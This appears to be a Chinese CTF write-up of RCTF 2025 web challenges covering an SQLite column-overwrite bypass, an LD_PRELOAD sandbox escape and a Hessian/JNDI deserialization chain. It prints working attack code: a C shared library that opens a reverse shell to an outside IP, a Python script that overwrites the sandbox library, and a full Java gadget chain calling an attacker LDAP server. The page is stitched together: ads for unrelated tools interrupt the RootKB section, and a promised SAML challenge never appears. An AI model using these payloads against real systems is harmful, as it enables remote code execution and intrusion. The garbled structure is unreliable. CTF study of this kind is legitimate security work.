RCTF 2025 Web 部分解题思路与漏洞分析

RCTF 2025 Web 挑战涉及 SQL 逻辑漏洞、容器逃逸、SAML 注入及 Java 反序列化。photographer 题利用 SQLite 左联查询字段覆盖绕过类型限制；RootKB 通过 LD_PRELOAD 劫持沙箱执行系统命令；Auth 题结合 JS 类型转换与 SAML 断言结构篡改实现越权；maybe_easy 则构建 Hessian 白名单利用链调用 JNDI 接口获取权限。各题均考察对底层协议及框架机制的理解。

神经兮兮发布于 2026/4/10更新于 2026/5/2111 浏览

RCTF 2025 Web 部分解题思路与漏洞分析

本次竞赛的 Web 题目涵盖了从基础逻辑绕过到复杂框架利用的多个层面。下面针对四道代表性题目进行复盘，重点分析漏洞原理与利用链构建。

photographer

这道题的核心在于 SQL 查询结果的字段的覆盖问题。题目要求 Auth::type() 小于 0 才能获取 flag，而 $user['type'] 的值来源于 findById 方法返回的数据。

查看源码发现，findById 执行的是左联查询（LEFT JOIN），不仅返回了 user 表的信息，还关联了 photo 表。由于 SQLite 使用的是 SQLITE3_ASSOC 模式，返回的是以列名索引的数组。这里存在一个关键的前置知识：当两个表存在同名字段时，后查询到的字段会覆盖先查询到的字段。

user 表和 photo 表都有 type 字段。photo 表的 type 是从 mime-type 解析出来的。如果我们能控制上传的图片 Content-Type，就能间接控制这个字段的值。

利用过程如下：

注册普通用户。
访问 /compose 路由上传背景图片。
将请求头中的 Content-Type 修改为 -1。
提交后，photo 表的 type 会被设置为 -1，从而覆盖 user 表的 type。
再次访问 superadmin.php 即可拿到 flag。

RootKB

题目基于 MaxKB 最新版本，提供了一个在线运行 Python 代码的工具入口。虽然环境有一定限制，但我们可以利用沙箱逃逸机制。

在 2.3.1 版本的 tool_code.py 中，引入了 LD_PRELOAD 环境变量来加载自定义的 .so 文件。这意味着只要我们能设置该变量并指向我们控制的共享库，程序启动时就会自动调用其中的 init() 函数。

我们需要构造一个恶意的 .so 文件，在其中写入反弹 Shell 的逻辑。C 语言示例代码如下：

#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void payload() {
    unsetenv("LD_PRELOAD");
    system("bash -c \"bash -i >& /dev/tcp/8.138.38.81/1337 0>&1\"");
}

__attribute__((constructor)) void init() {
    if (getenv("LD_PRELOAD") != NULL) {
        payload();
    }
}

编译生成 Z3.so 后，通过 Python 脚本将其写入沙箱目录覆盖原有的：

相关免费在线工具

Keycode 信息
查找任何按下的键的javascript键代码、代码、位置和修饰符。在线工具，Keycode 信息在线工具，online
Escape 与 Native 编解码
JavaScript 字符串转义/反转义；Java 风格 \uXXXX（Native2Ascii）编码与解码。在线工具，Escape 与 Native 编解码在线工具，online
JavaScript / HTML 格式化
使用 Prettier 在浏览器内格式化 JavaScript 或 HTML 片段。在线工具，JavaScript / HTML 格式化在线工具，online
JavaScript 压缩与混淆
Terser 压缩、变量名混淆，或 javascript-obfuscator 高强度混淆（体积会增大）。在线工具，JavaScript 压缩与混淆在线工具，online
加密/解密文本
使用加密算法（如AES、TripleDES、Rabbit或RC4）加密和解密文本明文。在线工具，加密/解密文本在线工具，online
Gemini 图片去水印
基于开源反向 Alpha 混合算法去除 Gemini/Nano Banana 图片水印，支持批量处理与下载。在线工具，Gemini 图片去水印在线工具，online

sandbox.so

def payload():
    import base64
    import os
    base64data = "xxxx"
    data = base64.b64decode(base64data)
    with open("/opt/maxkb-app/sandbox/sandbox.so", "wb") as f:
        f.write(data)
    return 1

package com.rctf.server.exp;
import com.rctf.server.tool.HessianFactory;
import com.rctf.server.tool.Maybe;
import org.springframework.jndi.support.SimpleJndiBeanFactory;
import org.springframework.beans.factory.BeanFactory;
import org.springframework.beans.factory.ObjectFactory;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.util.TreeMap;

public class exp {
    public static void main(String[] args) throws Exception {
        String jndiUrl = "ldap://8.138.38.81:1339/suibian";
        SimpleJndiBeanFactory beanFactory = new SimpleJndiBeanFactory();
        beanFactory.setShareableResources(jndiUrl);

        Class<?> tboFactoryClass = Class.forName("org.springframework.beans.factory.config.ObjectFactoryCreatingFactoryBean$TargetBeanObjectFactory");
        Constructor<?> tboFactoryConstructor = tboFactoryClass.getDeclaredConstructor(BeanFactory.class, String.class);
        tboFactoryConstructor.setAccessible(true);
        ObjectFactory<?> objectFactory = (ObjectFactory<?>) tboFactoryConstructor.newInstance(beanFactory, jndiUrl);

        Class<?> ofdihClass = Class.forName("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler");
        Constructor<?> ofdihConstructor = ofdihClass.getDeclaredConstructor(ObjectFactory.class);
        ofdihConstructor.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) ofdihConstructor.newInstance(objectFactory);

        Maybe maybe = new Maybe(handler);
        TreeMap treeMap = makeTreeMap(maybe, maybe);
        String serialize = HessianFactory.serialize(treeMap);
        System.out.println(serialize);
        HessianFactory.deserialize(serialize);
    }

    public static TreeMap makeTreeMap(Object v1, Object v2) throws Exception {
        TreeMap<Object,Object> m = new TreeMap<>();
        setFieldValue(m, "size", 2);
        setFieldValue(m, "modCount", 2);
        Class<?> nodeC = Class.forName("java.util.TreeMap$Entry");
        Constructor nodeCons = nodeC.getDeclaredConstructor(Object.class, Object.class, nodeC);
        nodeCons.setAccessible(true);
        Object node = nodeCons.newInstance(v1, new Object[0], null);
        Object right = nodeCons.newInstance(v2, new Object[0], node);
        setFieldValue(node, "right", right);
        setFieldValue(m, "root", node);
        return m;
    }

    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
        try {
            Field field = clazz.getDeclaredField(fieldName);
            if (field != null) field.setAccessible(true);
            else if (clazz.getSuperclass() != null) field = getField(clazz.getSuperclass(), fieldName);
            return field;
        } catch (NoSuchFieldException e) {
            if (!clazz.getSuperclass().equals(Object.class)) {
                return getField(clazz.getSuperclass(), fieldName);
            }
            throw e;
        }
    }
}

RCTF 2025 Web 部分解题思路与漏洞分析